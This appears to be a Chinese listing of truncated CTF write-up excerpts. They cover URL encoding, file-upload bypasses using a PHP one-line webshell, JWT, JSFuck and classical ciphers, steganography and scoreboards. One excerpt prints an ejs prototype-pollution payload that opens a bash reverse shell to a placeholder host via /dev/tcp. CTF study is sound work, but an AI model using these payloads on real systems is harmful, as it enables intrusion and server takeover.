url编码又叫百分号编码,是统一资源定位(URL)编码方式 URL地址(常说网址)规定了常用地数字,字母可以直接使用,另外一批作为特殊用户字符也可以直接用(/,:@等),剩下的其它所有字符必须通过在该字节ascii码的的16进制字符前面加%编码处理 js:有encodeURI、encodeURIComponent PHP有 urlencode、urldecode等 url编码和双重编...
第一题:无限制上传 这一题对上传的文件没有任何限制,我们就直接上传一个一句话木马的php文件上去,直接蚁剑链接找flag就ok了。 第二题:JS前端验证 对与前端认证,有两种解决办法绕过,第一个是在浏览器中禁用js渲染,第二个是先把文件后缀改成符合上传的后缀,在通过burp抓包把后缀重新改回.php格式再重新发送。 第...
虎符ctf web部分复现-第一题-easy_login 一. 了解Node.js 简单的说Node.js就是运行在服务端的 JavaScript (一) node.js的常见文件目录 (二) 了解jwt Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的...
可以看到后面的属性会将前面的属性覆盖掉。 那么便可以用于原型链污染。 那么目的明确:将ejs中outputFunctionName属性污染成恶意代码。 也就是(可以直接在网上找到) "outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/公网ip/端口 0>&1...
easy_login 简单介绍一下什么是JWT Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源...
1.jsfuck 2.patriciopalladino 其他解密方式:alert(xxx)、console(xxx)、document.write(xxx)即可(xxx为编码内容)。 更多jother介绍请参考:jother编码之谜 0x0a 培根密码 培根所用的密码是一种本质上用二进制数设计的。不过,他没有用通常的0和1来表示,而是采用a和b。 详见百度百科 0x0b 猪圈密码又称共济会密码...
7 easysteg 难度 简单 可以看到一个缺少定位符的二维码,补全后拿到提示:一种常见的隐写 分离图片拿到压缩包 解压后配合观察图片名称格式,使用stegpy拿到flag flag{Do_U_Kn0w_Ste9py??} 8 压缩包压缩包压缩包 难度 简单 第一层为50996.zip 写脚本解密递归压缩包 300层 ...
常用的代码混淆有jsfuck、brainfuck,Vbscript.encode加密等1、Jsfuck jsfuck源于一门编程语言brainfuck,其主要的思想就是只使用8种特定的符号来编写代码。而jsfuck也是沿用了这个思想,它可以让你只用 6 个字符`[ ]( ) ! + `来编写 JavaScript 程序。此外,JSFuck可用于绕过恶意代码检测,且可以被用于跨站脚本攻击。
Crypto-easy 1.BASE 拿到附件用cyberchef自动解码得到flag 2.basic-crypto 拿到附件发现是一串01的数字,这时候想到二进制转换 然后base64在线解码 接着根据提示想到凯撒密码解密 最后通过字频查找找到flag 3.CheckIn 先用base64解码 再用ROT47解码得到flag
super_easy3:Pwnable:30pts js:Misc:30pts polyglot:Misc:30pts polygolf:Misc:50pts Thor 2021 CTF (2021/11/26) Thor 2021 CTF 4813 Points Break the logic:Web:652pts Phpbaby:Web:528pts Tricks 1:Web:120pts How to read read without read:Web:630pts Tricks 2:Web:270pts You Shall Not EVAL...